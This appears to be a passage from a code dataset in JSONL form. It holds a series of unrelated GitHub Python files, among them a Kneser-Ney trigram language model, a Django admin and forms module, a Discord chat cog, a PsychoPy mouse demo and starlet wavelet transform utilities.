0:\n\t\tprint('Fizz')\n\telse:\n\t\tprint(i+1)\nprint('')","repo_name":"Astro1123/practice","sub_path":"FizzBuzz/Python3/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74810241495","text":"#coding:utf-8 \nfrom django.contrib import admin\n\n# Register your models here.\nfrom myapp.models import AliOrd, AliConfig, Agent, PayResult\n\n# Add in this class to customized the Admin Interface\nclass AliOrdAdmin(admin.ModelAdmin):\n list_display = ('CommId', 'CommPrice', 'PayAmount','SettleDate','RebateAmt','OrderId','PosName','UplineName','Up2lineName',)\n\nclass AliConfigAdmin(admin.ModelAdmin):\n list_display = ('GroupId', 'AgentId', 'AgentUpId', 'ZhaohuoPid', 'AppPid', 'AgentPerc', 'Agent2rdPerc', 'Agent3rdPerc',)\n\nclass AgentAdmin(admin.ModelAdmin):\n list_display = ('AgentName', 'AgentId',)\n\nclass PayResultAdmin(admin.ModelAdmin):\n list_display = ('GroupId', 'AgentName', 'AgentId', 'AgentUpName', 'AgentUpId', 'ZhaohuoPid', 'AppPid', 'AgentPerc', 'Agent2rdPerc', 'Agent3rdPerc',\n 'IncomeSelf', 'IncomeLv1', 'IncomeLv2', 'IncomeTotal', 'CalculateStatus', 'CalculateYear', 'CalculateMonth', 'PayAccount', 'PayStatus',)\n\nadmin.site.register(AliOrd, AliOrdAdmin)\nadmin.site.register(AliConfig, AliConfigAdmin)\nadmin.site.register(Agent, AgentAdmin)\nadmin.site.register(PayResult, PayResultAdmin)","repo_name":"georgesze/mysite4","sub_path":"myapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19698855696","text":"from imageai.Detection import ObjectDetection\nimport os\n\nexec_path = os.getcwd()\nprint(exec_path)\ndetector = ObjectDetection()\ndetector.setModelTypeAsRetinaNet()\ndetector.setModelPath(os.path.join(\n exec_path, \"resnet50_coco_best_v2.0.1.h5\")\n)\ndetector.loadModel()\nlist = detector.detectObjectsFromImage(\n input_image = os.path.join(exec_path, \"people.jpg\"),\n output_image_path = os.path.join(exec_path, \"new_people.jpg\"),\n minimum_percentage_probability = 30,\n display_percentage_probability = False,\n display_object_name = True\n)","repo_name":"zvrv-dasha/kpfu-homeworks","sub_path":"image-ai-detecting-objects-photo/ImageAI_photo.py","file_name":"ImageAI_photo.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15281539317","text":"from pydantic import BaseSettings, Field\n\n\nclass Settings(BaseSettings):\n CORS_ORIGINS: list[str] = Field(\n default=[\"*\"],\n env=\"CORS_ORIGINS\",\n description=\"A list of origins that should be allowed to make cross-origin requests.\",\n )\n HOST: str = Field(default=\"0.0.0.0\", env=\"HOST\")\n PORT: int = Field(default=8000, env=\"PORT\")\n GOOGLE_APPLICATION_CREDENTIALS: str | None = Field(\n default=None, env=\"GOOGLE_APPLICATION_CREDENTIALS\")\n GOOGLE_APPLICATION_CREDENTIALS_FILE_PATH: str | None = Field(\n default=None, env=\"GOOGLE_APPLICATION_CREDENTIALS_FILE_PATH\"\n )\n GUEST_SPREADSHEET_ID: str | None = Field(\n env=\"GUEST_SPREADSHEET_ID\"\n )\n LOG_LEVEL: str = Field(default=\"INFO\", env=\"LOG_LEVEL\")\n REPOSITORY_TYPE: str = Field(\n default=\"sqlite\",\n env=\"REPOSITORY_TYPE\",\n description=\"The type of repository to use. Can be 'sqlite' or 'gsheets'.\",\n )\n SQLITE_DATABASE_PATH: str = Field(\n default=\"sqlite:///./data.db\",\n env=\"SQLITE_DATABASE_PATH\",\n description=\"The path to the SQLite database file.\",\n )\n\n class Config:\n env_file = \".env\"\n env_file_encoding = \"utf-8\"\n","repo_name":"kttur/karim-vika-wedding-back","sub_path":"src/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73795277976","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom collections import defaultdict\nimport numpy as np\nfrom ngram_lm import BaseLM \n\nclass KNTrigramLM(BaseLM):\n \"\"\"Trigram LM with Kneser-Ney smoothing.\"\"\"\n order_n = 3\n # For testing - do not modify.\n state_vars = ['delta', 'counts', 'type_contexts',\n 'context_totals', 'context_nnz', 'type_fertility',\n 'z_tf', 'words']\n\n def __init__(self, tokens):\n \"\"\"Build our smoothed trigram model.\n\n This should be similar to the AddKTrigramLM.__init__ function, above,\n but will compute a number of additional quantities that we need for the\n more sophisticated KN model.\n\n See the documentation in the notebook for the KN backoff model\n definition and equations, and be sure to read the in-line comments\n carefully to understand what each data structure represents.\n\n Note the usual identification of variables:\n w : c : current word\n w_1 : w_{i-1} : b : previous word\n w_2 : w_{i-2} : a : previous-previous word\n\n There are two blocks of code to fill here. In the first one, you should\n fill in the inner loop to compute:\n self.counts (unigram, bigram, and trigram)\n self.type_contexts (set of preceding words for each word (type))\n\n In the second one, you should compute:\n self.context_totals (as in AddKTrigramLM)\n self.context_nnz (number of nonzero elements for each context)\n self.type_fertility (number of unique preceding words for each word\n (type))\n\n The starter code will fill in:\n self.z_tf (normalization constant for type fertilities)\n self.words (list of words known to the model)\n\n Args:\n tokens: (list or np.array) of training tokens\n\n Returns:\n None\n \"\"\"\n self.delta = 0.75\n # Raw counts over the corpus.\n # Keys are context (N-1)-grams, values are dicts of word -> count.\n # You can access C(w | w_{i-1}, ...) as:\n # unigram: self.counts[()][w]\n # bigram: self.counts[(w_1,)][w]\n # trigram: self.counts[(w_2,w_1)][w]\n self.counts = defaultdict(lambda: defaultdict(lambda: 0))\n # As in AddKTrigramLM, but also store the unigram and bigram counts\n # self.context_totals[()] = (total word count)\n # self.context_totals[(w_1,)] = c(w_1)\n # self.context_totals[(w_2, w_1)] = c(w_2, w_1)\n self.context_totals = dict()\n # Also store in self.context_nnz the number of nonzero entries for each\n # context; as long as \\delta < 1 this is equal to nnz(context) as\n # defined in the notebook.\n self.context_nnz = dict()\n\n # Context types: store the set of preceding words for each word\n # map word -> {preceding_types}\n self.type_contexts = defaultdict(lambda: set())\n # Type fertility is the size of the set above\n # map word -> |preceding_types|\n self.type_fertility = dict()\n # z_tf is the sum of type fertilities\n self.z_tf = 0.0\n\n\n # Iterate through the word stream once\n # Compute unigram, bigram, trigram counts and type fertilities\n w_1, w_2 = None, None\n for word in tokens:\n self.counts[()][word] += 1\n if w_1 is not None:\n self.counts[(w_1,)][word] += 1\n self.type_contexts[word].add(w_1)\n if w_2 is not None:\n self.counts[(w_2,w_1)][word] += 1\n\n # Update context\n w_2 = w_1\n w_1 = word\n\n ##\n # We'll compute type fertilities and normalization constants now,\n # but not actually store the normalized probabilities. That way, we can compute\n # them (efficiently) on the fly.\n\n # Count the total for each context.\n self.context_totals = {k:float(sum(c.values())) for k,c in self.counts.items()}\n\n # Count the number of nonzero entries for each context.\n self.context_nnz = {k:len(c) for k,c in self.counts.items()}\n\n\n # Compute type fertilities, and the sum z_tf.\n self.type_fertility = {w:len(s) for w,s in self.type_contexts.items()}\n\n\n self.z_tf = float(sum(self.type_fertility.values()))\n\n\n # Freeze defaultdicts so we don't accidentally modify later.\n self.counts.default_factory = None\n self.type_contexts.default_factory = None\n\n # Total vocabulary size, for normalization\n self.words = list(self.counts[()].keys())\n self.V = len(self.words)\n\n def set_live_params(self, delta = 0.75, **params):\n self.delta = delta\n\n def kn_interp(self, word, context, delta, pw):\n \"\"\"Compute KN estimate P_kn(w | context) given a backoff probability\n\n Your code should implement the absolute discounting equation from the\n notebook, using the counts computed in __init__(). Note that you don't\n need to deal with type fertilities here; this is handled in the\n next_word_proba() function in the starter code, below.\n\n Be sure you correctly handle the case where c(context) = 0, so as to not\n divide by zero later on. You should just return the backoff probability\n directly, since we have no information to decide otherwise.\n\n Be sure that you don't modify the parameters of the model in this\n function - in particular, you shouldn't (intentionally or otherwise)\n insert zeros or empty dicts when you encounter an unknown word or\n context. See note on dict.get() below.\n\n Args:\n word: (string) w in P(w | context )\n context: (tuple of string)\n delta: (float) discounting term\n pw: (float) backoff P_kn(w | less_context), precomputed\n\n Returns:\n (float) P_kn(w | context)\n \"\"\"\n # Hint: self.counts.get(...) and self.context_totals.get(...) are\n # useful here. See note in dict_notes.md about how this works.\n c0 = self.counts.get(context, {}).get(word, 0)\n z0 = self.context_totals.get(context, 0)\n # If context is never seen, pass through backoff unchanged\n if z0 == 0: return pw\n # Interpolation factor alpha\n alpha = delta * (self.context_nnz.get(context, 0) / z0)\n pwc = max(0, c0 - delta)/z0\n return pwc + alpha * pw\n\n\n def next_word_proba(self, word, seq):\n \"\"\"Compute next word probability with KN backoff smoothing.\n\n Args:\n word: (string) w in P(w | w_1 w_2 )\n seq: list(string) [w_1, w_2, w_3, ...]\n delta: (float) discounting term\n\n Returns:\n (float) P_kn(w | w_1 w_2)\n \"\"\"\n delta = delta = self.delta\n # KN unigram, then recursively compute bigram, trigram\n pw1 = self.type_fertility.get(word, 0.0) / self.z_tf\n pw2 = self.kn_interp(word, tuple(seq[-1:]), delta, pw1)\n pw3 = self.kn_interp(word, tuple(seq[-2:]), delta, pw2)\n return pw3\n","repo_name":"datasci-w266/2021-spring-main","sub_path":"assignment/a5/kn_lm.py","file_name":"kn_lm.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"43165775475","text":"#!/usr/bin/env python\nfrom psychopy import visual, core, event, misc\n\"\"\"\nAs of version 1.51 the mouse coordinates for\n myMouse.getPos()\n myMouse.setPos() #pygame only\n myMouse.getRel()\nare in the same units as the window.\n\nYou can also check the motion of the wheel with myMouse.getWheelRel() \n(in two directions for the mac mighty mouse or equivalent!)\n\"\"\"\n#create a window to draw in\nmyWin = visual.Window((600.0,600.0), allowGUI=True)\n\n#INITIALISE SOME STIMULI\nfixSpot = visual.PatchStim(myWin,tex=\"none\", mask=\"gauss\",\n pos=(0,0), size=(0.05,0.05),color='black', autoLog=False)\ngrating = visual.PatchStim(myWin,pos=(0.5,0),\n tex=\"sin\",mask=\"gauss\",\n color=[1.0,0.5,-1.0],\n size=(1.0,1.0), sf=(3,0),\n autoLog=False)#this stim changes too much for autologging to be useful\nmyMouse = event.Mouse() # will use myWin by default\nmessage = visual.TextStim(myWin,pos=(-0.95,-0.9),alignHoriz='left',height=0.08,\n text='left-drag=SF, right-drag=pos, scroll=ori',\n autoLog=False)\n\nwhile True: #continue until keypress\n #handle key presses each frame\n for key in event.getKeys():\n if key in ['escape','q']:\n core.quit()\n \n #get mouse events\n mouse_dX,mouse_dY = myMouse.getRel()\n mouse1, mouse2, mouse3 = myMouse.getPressed()\n if (mouse1):\n grating.setSF(mouse_dX, '+')\n elif (mouse3):\n grating.setPos([mouse_dX, mouse_dY], '+')\n \n #Handle the wheel(s):\n # Y is the normal mouse wheel, but some (e.g. mighty mouse) have an x as well\n wheel_dX, wheel_dY = myMouse.getWheelRel()\n grating.setOri(wheel_dY*5, '+')\n \n event.clearEvents()#get rid of other, unprocessed events\n \n #do the drawing\n fixSpot.draw()\n grating.setPhase(0.05, '+')#advance 0.05cycles per frame\n grating.draw()\n message.draw()\n myWin.flip()#redraw the buffer\n\n","repo_name":"sloria/psychopy-project-template","sub_path":"psychopy/psychopy/demos/coder/input/mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"68"} +{"seq_id":"1402511222","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef read_file_tum(filename):\n file = open(filename)\n data = file.read()\n lines = data.replace(\",\", \" \").replace(\"\\t\", \" \").split(\"\\n\")\n list = [[v.strip() for v in line.split(\" \") if v.strip() != \"\"] for line in lines if\n len(line) > 0 and line[0] != \"#\"]\n list = [l[1:] for l in list if len(l) > 1]\n return np.array(list).astype(np.float)\n\n\n\nitypes = [\n \"rgb\",\n \"rgbd\",\n \"d\",\n \"o\",\n \"do\",\n \"rgbdo\",\n \"rgbo\"\n]\nbasedir = \"/home/micha/dev/ml/orb_imitation/datagen/eval/trajectories/track3\"\n\n# plot ground truth\n# data = read_file_tum(basedir + f\"/groundtruth_trajectory_track3.tum\")\n# # print(data.shape)\n# xval = data[:, 0]\n# yval = data[:, 1]\n# plt.plot(xval, yval, label=\"min. snap\")\n\ndata = read_file_tum(basedir + f\"/actual_trajectory_track3.tum\")\n# print(data.shape)\nxval = data[:, 0]\nyval = data[:, 1]\nplt.plot(xval, yval, label=\"ground truth\", color=\"black\", linestyle=\"--\", linewidth=2)\n\nfor el in itypes:\n\n data = read_file_tum(basedir + f\"/trajectory_{el}.tum\")\n # print(data.shape)\n\n xval = data[:, 0]\n yval = data[:, 1]\n\n plt.plot(xval, yval, label=el.upper())\nplt.grid()\nplt.legend()\nplt.ylabel(\"position y axis world frame [m]\")\nplt.xlabel(\"position x axis world frame [m]\")\nplt.show()\n\n","repo_name":"oludom/airsim_datagen","sub_path":"eval/plot_trajectories.py","file_name":"plot_trajectories.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15301076791","text":"from ntpath import join\nimport os\nimport math\nimport numpy as np\nimport itertools\nimport sympy as sp\nfrom prettytable import PrettyTable\n\nprint(\"Enter count of alternatives n: \",end='')\nn = int(input())\nprint(\"Enter count of experts m: \",end='')\nm = int(input())\nprint(\"Generate files? y/n: \",end='')\nis_generate_tests = input()\n\n# n = 3\n# m = 3\n\n# количество перестановок с повторениями из n! элементов по m позициям\ndef count_of_expert_profiles_variants(n, m):\n if n == 1:\n return 1\n elif m == 1:\n # количество вариантов размещения n альтернатив по n местам (перестановки)\n return sp.factorial(n)\n else: # каждый вариант размещения альтернатив - это один элемент, который могут выбрать один или несколько экспертов\n return sp.factorial(sp.factorial(n) - 1 + m) / \\\n ( sp.factorial(sp.factorial(n)-1) * sp.factorial(m) )\n\n\nmax_experts_num = 7\nmax_alternatives_num = 7\ntable_cnt_of_EPV = [[count_of_expert_profiles_variants(N+1, M+1) \nfor M in range(max_experts_num)]\nfor N in range(max_alternatives_num)]\n\ntable = PrettyTable()\ntable.field_names = [\"\"] + \\\n ['m = {}'.format(M+1) for M in range(max_experts_num)]\nfor N in range(max_alternatives_num):\n table.add_row(['n = {}'.format(N+1)] + \\\n [table_cnt_of_EPV[N][M] for M in range(max_experts_num)])\ntable.align = 'l'\nprint(table)\n\n# =================================================\n\ndirectory_with_tests = os.getcwd()\n\n\ndef make_file(text, file_name):\n file_txt = open(directory_with_tests + \"\\{}.txt\".format(file_name), \"w\")\n file_txt.write(text)\n file_txt.close()\n\n\ndef list_to_string(List):\n return \" \".join(map(str, List))\n\n\ndef lists_to_strings(Lists):\n return \"\\n\".join(map(list_to_string, Lists))\n\n\ndef make_files_with_tests():\n global n, m\n single_profile_variants = list(\n itertools.permutations([i+1 for i in range(n)]))\n all_profiles_variants = list(itertools.combinations_with_replacement(\n single_profile_variants, m))\n number_len = len(str(table_cnt_of_EPV[n-1][m-1]))\n for i in range(len(all_profiles_variants)):\n text = lists_to_strings(all_profiles_variants[i])\n make_file(text, 'n{0}m{1}_t{2:0>{3}d}'.format(n,m,i+1,number_len))\n\n\nif is_generate_tests == \"y\":\n make_files_with_tests()\n print(\"Расположение файлов:\", directory_with_tests)\n","repo_name":"GrapevineSnail/Tests_for_GroupChoiseAlgorythms","sub_path":"generate_tests_and_table_with_cnt_of_variants.py","file_name":"generate_tests_and_table_with_cnt_of_variants.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31742238494","text":"from config import CFG\nimport torch\nfrom transformers import pipeline\nfrom model import model,tokenizer\nfrom langchain.llms import HuggingFacePipeline\n\n\n\nmax_len=1040\n\npipe = pipeline(\n task = \"text-generation\",\n model = model,\n tokenizer = tokenizer,\n pad_token_id = tokenizer.eos_token_id,\n max_length = max_len,\n temperature = CFG.temperature,\n top_p = CFG.top_p,\n repetition_penalty = CFG.repetition_penalty\n)\n\nllm = HuggingFacePipeline(pipeline = pipe)","repo_name":"ogigo/llama-2_for_document_analysis","sub_path":"hf_pipeline.py","file_name":"hf_pipeline.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42911901291","text":"# https://www.acmicpc.net/problem/2293\r\n# title: 동전 1\r\n# start: 2022-03-20 01:19:30 AM\r\n# end: 2022-03-20 04:09:00 AM\r\n\r\ndef solution(coin_list: list, K: int):\r\n dp = [0] * (K+1)\r\n dp[0] = 1\r\n\r\n for coin in coin_list:\r\n for number in range(coin, K + 1):\r\n dp[number] = dp[number] + dp[number - coin]\r\n\r\n return dp[K]\r\n\r\n\r\nif __name__ == '__main__':\r\n num_coin, K = map(int, input().split())\r\n coin_list = []\r\n for _ in range(num_coin):\r\n coin = int(input())\r\n coin_list.append(coin)\r\n\r\n result = solution(coin_list, K)\r\n print(result)\r\n","repo_name":"SleepyCloud023/coding-test-study-note","sub_path":"Greedy/boj_2293/boj_2293.py","file_name":"boj_2293.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9836113268","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import MissingRequiredArgument, MissingPermissions\nfrom discord import Forbidden\nfrom discord.commands import slash_command, Option\nfrom discord.commands import permission\n\nfrom exceptions import *\nfrom data import Data\n\nfrom .logging import Logging\ndata = Data() # Connect to database\n\n\nclass Chat(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.Cog.listener()\n async def on_message(self, message):\n import re\n\n if message.author.bot:\n return\n\n # check if the channel is muted\n if data.get_guild(message.guild.id).get_channel(message.channel.id).muted_events:\n return\n\n # if the message contains 'hi', say 'hi'\n if re.search(r\"hi\", message.content):\n await message.channel.send('hi')\n\n # if message has I'm followed by a sentence, say \"Hi , I'm Jerald\"\n if re.search(r\"\\bi'?m ([\\s\\w]+)\\.?\", message.content, re.IGNORECASE):\n sentence = re.search(\n r\"\\bi'?m ([\\s\\w]+)\\.?\", message.content, re.IGNORECASE).group(1)\n await message.channel.send(f\"Hi {sentence}, I'm Jerald\")\n\n # if the message is all caps\n if re.search(r\"^[A-Z\\s'!.?]+$\", message.content):\n await message.channel.send(\n f\"{message.author.mention} keep your voice down!\")\n\n @slash_command(guild_ids=data.enabled_slash, name='mute_channel', description='Stop jerald from talking in the specified channel')\n async def mute_channel(\n self,\n ctx,\n channel: Option(discord.TextChannel, \"Channel to mute\",\n required=False, default=None),\n all: Option(bool, \"Mute all channels\", required=False, default=False)\n ):\n \"\"\"\n Stops Jerald from talking in the specified channel.\n \"\"\"\n # get the channel\n channel = ctx.channel if channel is None else channel\n\n # get the guild\n guild_data = data.get_guild(ctx.guild.id)\n\n if all:\n channels_muted = []\n for channel in ctx.guild.channels:\n try:\n channel_data = guild_data.get_channel(channel.id)\n except EntryNotFound:\n channel_data = guild_data.add_channel(\n channel.id, channel.name) # add the channel to the database\n\n if channel_data.muted_events == False:\n channel_data.muted_events = True\n # add channel to list of muted channels\n channels_muted.append(channel)\n\n # Mention each channel\n channels_muted = [c.mention for c in channels_muted]\n\n # Joined string\n channels_muted = '\\n'.join(channels_muted)\n\n # Send response\n response = discord.Embed(\n title=\"Channels Unmuted\",\n description=f\"The following channels have been muted:\\n{channels_muted}\",\n color=0x00ff00\n )\n\n response = await ctx.respond(embed=response)\n\n await Logging.log_command(ctx, action='Command',\n extra=f\"Umuted channels: {channels_muted}\")\n\n return\n\n # get the channel or add it if it doesn't exist\n try:\n channel_data = guild_data.get_channel(channel.id)\n except EntryNotFound:\n channel_data = guild_data.add_channel(channel.id, channel.name)\n\n # Check if the channel is already muted\n if channel_data.muted_events:\n response = discord.Embed(\n title=\"Channel already muted\",\n description=f\"{channel.mention} is already muted\",\n color=0xFFff00\n )\n\n response = await ctx.respond(embed=response)\n\n await Logging.log_command(ctx, action='Command',\n extra=f\"Failed to unmute channel: {channel.name}\")\n\n return\n\n # mute the channel\n channel_data.muted_events = True\n\n # send a response\n response = discord.Embed(\n title=\"Channel Muted\",\n description=f\"{channel.mention} has been muted\",\n color=0x00ff00\n )\n\n response = await ctx.respond(embed=response)\n\n await Logging.log_command(ctx, action='Command',\n extra=f\"Muted channel: {channel.name}\")\n\n return\n\n @slash_command(guild_ids=data.enabled_slash, name='unmute_channel', description='Allow jerald to talk in this channel')\n async def unmute_channel(\n self,\n ctx,\n channel: Option(discord.TextChannel, \"Channel to unmute\",\n required=False, default=None),\n all: Option(bool, \"Unmute all channels\", required=False, default=False)\n ):\n \"\"\"\n Unmute the channel\n \"\"\"\n # get the channel\n channel = ctx.channel if channel is None else channel\n\n # get the guild\n guild_data = data.get_guild(ctx.guild.id)\n\n if all:\n # unmute all channels\n channels_unmuted = []\n for channel in ctx.guild.channels:\n try:\n channel_data = guild_data.get_channel(channel.id)\n except EntryNotFound:\n # add the channel if it doesn't exist\n channel_data = guild_data.add_channel(\n channel.id, channel.name)\n\n if channel_data.muted_events: # if the channel is muted\n channel_data.muted_events = False\n # add each channel unmuted to the list\n channels_unmuted.append(channel)\n\n # Mention each channel\n channels_unmuted = [c.mention for c in channels_unmuted]\n\n # Joined string\n channels_unmuted = '\\n'.join(channels_unmuted)\n\n # Send a response\n response = discord.Embed(\n title=\"Channels Unmuted\",\n description=f\"The following channels have been unmuted:\\n{channels_unmuted}\",\n color=0x00ff00\n )\n\n response = await ctx.respond(embed=response)\n\n await Logging.log_command(ctx, action='Command',\n extra=f\"Umuted channels: {channels_unmuted}\")\n\n return\n\n # get the channel or add it if it doesn't exist\n try:\n channel_data = guild_data.get_channel(channel.id)\n except EntryNotFound:\n channel_data = guild_data.add_channel(channel.id, channel.name)\n\n # Check if the channel is already unmuted\n if channel_data.muted_events == False:\n response = discord.Embed(\n title=\"Channel Unmuted\",\n description=f\"{channel.mention} is already unmuted\",\n color=0xffff00\n )\n\n response = await ctx.respond(embed=response)\n\n await Logging.log_command(ctx, action='Command',\n extra=f\"Failed to unmute channel: {channel.name}\")\n\n return\n\n # unmute the channel\n channel_data.muted_events = False\n\n # send a response\n response = discord.Embed(\n title=\"Channel Unmuted\",\n description=f\"{channel.mention} has been unmuted\",\n color=0x00ff00\n )\n\n response = await ctx.respond(embed=response)\n\n await Logging.log_command(ctx, action='Command',\n extra=f\"Unmuted channel: {channel.name}\")\n\n return\n\n\ndef setup(client):\n client.add_cog(Chat(client))\n","repo_name":"Moulik-Budhiraja/Python-Discord-Bot","sub_path":"code/cogs/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":7755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"17646146233","text":"\nfrom django import forms\n\nfrom iyph.models import IyphPost,Chronology,Photo,ChronologyFiles\nfrom mezzanine.core.models import CONTENT_STATUS_DRAFT\nfrom django.contrib.admin.widgets import AdminDateWidget \nfrom django.forms.models import inlineformset_factory\nfrom django.forms.formsets import formset_factory\n# These fields need to be in the form, hidden, with default values,\n# since it posts to the blog post admin, which includes these fields\n# and will use empty values instead of the model defaults, without\n# these specified.\nhidden_field_defaults = (\"status\", \"gen_description\", \"allow_comments\")\n\n\nclass IyphPostForm(forms.ModelForm):\n \"\"\"\n Model form for ``IyphPost`` that provides the quick Iyph panel in the\n admin dashboard.\n \"\"\"\n\n class Meta:\n model = IyphPost\n fields = (\"title\", \"content\") + hidden_field_defaults\n\n def __init__(self):\n initial = {}\n for field in hidden_field_defaults:\n initial[field] = IyphPost._meta.get_field(field).default\n initial[\"status\"] = CONTENT_STATUS_DRAFT\n super(IyphPostForm, self).__init__(initial=initial)\n for field in hidden_field_defaults:\n self.fields[field].widget = forms.HiddenInput()\n\n\nclass ChronologyForm(forms.ModelForm):\n class Meta:\n model = Chronology\n fields = [\n 'title', \n 'image', \n 'programme_type',\n 'chron_type',\n 'start_date', \n 'end_date', \n 'summary',\n 'venue',\n 'country',\n 'venue_description',\n 'contact',\n 'url_website', \n ]\n exclude = ('author', 'status', 'publish_date', 'modify_date','chron_type','inhomepage','is_key_event')\n widgets = {\n 'start_date': AdminDateWidget(), \n 'end_date': AdminDateWidget(), \n }\nChronologyFilesFormSet = inlineformset_factory(Chronology, ChronologyFiles,extra=1)\n\nclass PhotoForm(forms.ModelForm):\n class Meta:\n model = Photo\n fields = [\n 'photographer_first_name',\n 'photographer_last_name',\n 'email',\n 'emailconfirmation', \n 'country',\n 'age',\n 'title',\n 'image', \n 'date_taken',\n 'place_taken',\n 'short_description', \n 'agree', \n ]\n exclude = ('modify_date','library', 'status', 'publish_date', 'finalist','exibition','prize')\n widgets = {\n 'photographer_first_name': forms.TextInput(attrs={'class':'zzz'}),\n 'photographer_last_name': forms.TextInput(attrs={'class':'zzz'}),\n 'email': forms.TextInput(attrs={'class':'zzz'}),\n 'emailconfirmation': forms.TextInput(attrs={'class':'zzz'}),\n 'country': forms.Select(attrs={'class':'zzz'}),\n 'age': forms.TextInput(attrs={'class':'zzz'}),\n 'title': forms.TextInput(attrs={'class':'zzz'}),\n 'date_taken': AdminDateWidget(), \n 'place_taken': forms.TextInput(attrs={'class':'zzz'}),\n 'short_description': forms.Textarea(attrs={'class':'zzz'}),\n } \n \n","repo_name":"ippc/ippcdj","sub_path":"iyph/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14559164095","text":"import numpy as np\nfrom scipy.ndimage import convolve1d\nfrom scipy.ndimage import median_filter\nfrom robust_stats import MAD\n\n\n# default spline wavelet scaling function\n_phi = np.array([1.0/16, 1.0/4, 3.0/8, 1.0/4, 1.0/16])\n\n\ndef up_sampling(a):\n \"\"\"Up-sampling an array by interleaving it with zero values.\"\"\"\n shp = a.shape\n shp1 = [ 2*i-1 for i in shp ]\n a1 = np.zeros(shp1, dtype=a.dtype)\n a1[[slice(None, None, 2) for i in shp]] = a\n\n return a1\n\n\ndef convolve(a, phi):\n \"\"\"Convolve `a` along each axis sequentially by `phi`.\"\"\"\n for ax in xrange(a.ndim):\n a = convolve1d(a, phi, axis=ax, mode='reflect')\n\n return a\n\n\ndef starlet_transform(a, level=None, gen2=False, approx_only=False, phi=_phi):\n \"\"\"Computes the starlet transform (i.e. the undecimated isotropic wavelet\n transform) of an array.\n\n The output is a python list containing the sub-bands. If the keyword Gen2\n is set, then it is the 2nd generation starlet transform which is computed:\n i.e., g = Id - h*h instead of g = Id - h.\n\n \"\"\"\n\n if level == None:\n level = int(np.ceil(np.log2(np.min(a.shape))))\n\n if level <= 0:\n return [ a ]\n\n phi = phi.astype(a.dtype)\n W = []\n\n for li in xrange(level):\n if li > 0:\n phi = up_sampling(phi)\n approx = convolve(a, phi)\n if not approx_only:\n if gen2:\n # 2nd generation starlet transfrom applies smoothing twice\n W.append(a - convolve(approx, phi))\n else:\n W.append(a - approx)\n a = approx\n\n W.append(approx)\n\n return W\n\n\ndef starlet_smooth(a, level=None, phi=_phi):\n \"\"\"Return the smooth component of the first generation starlet transform.\"\"\"\n return starlet_transform(a, level=level, gen2=False, approx_only=True, phi=phi)[0]\n\n\ndef starlet_detrend(a, level=None, phi=_phi):\n \"\"\"Return the detrended component (i.e., smooth component being subtracted) of the first generation starlet transfrom.\"\"\"\n return a - starlet_smooth(a, level, phi)\n\n\ndef multiscale_median_transform(a, level=None, scale=2, approx_only=False):\n \"\"\"Multiscale median transform.\"\"\"\n\n if level == None:\n level = int(np.ceil(np.log2(np.min(a.shape))))\n\n if level <= 0:\n return [ a ]\n\n W = []\n\n for li in xrange(level):\n if li > 0:\n scale *= 2\n approx = median_filter(a, 2*scale+1)\n if not approx_only:\n W.append(a - approx)\n a = approx\n\n W.append(approx)\n\n return W\n\n\ndef multiscale_median_smooth(a, level=None, scale=2):\n \"\"\"Return the smooth component of the multiscale median transform.\"\"\"\n return multiscale_median_transform(a, level=level, scale=scale, approx_only=True)[0]\n\n\ndef multiscale_median_detrend(a, level=None, scale=2):\n \"\"\"Return the detrended component (i.e., smooth component being subtracted) of the multiscale median transfrom.\"\"\"\n return a - multiscale_median_smooth(a, level, scale)\n\n\ndef median_wavelet_transform(a, level=None, scale=2, tau=5.0, approx_only=False, phi=_phi):\n \"\"\"Median-wavelet transfrom.\"\"\"\n\n if level == None:\n level = int(np.ceil(np.log2(np.min(a.shape))))\n\n if level <= 0:\n return [ a ]\n\n phi = phi.astype(a.dtype)\n W = []\n\n for li in xrange(level):\n if li > 0:\n scale *= 2\n approx = median_filter(a, 2*scale+1)\n w = a - approx\n th = tau * MAD(w)\n # th = tau * MAD(w[w!=0])\n w[np.abs(w) > th] = 0\n approx += w\n approx = starlet_smooth(approx, li+1, phi)\n\n if not approx_only:\n W.append(a - approx)\n a = approx\n\n W.append(approx)\n\n return W\n\n\ndef median_wavelet_smooth(a, level=None, scale=2, tau=5.0, phi=_phi):\n \"\"\"Return the smooth component of the median-wavelet transform.\"\"\"\n return median_wavelet_transform(a, level=level, scale=scale, tau=tau, approx_only=True, phi=phi)[0]\n\n\ndef median_wavelet_detrend(a, level=None, scale=2, tau=5.0, 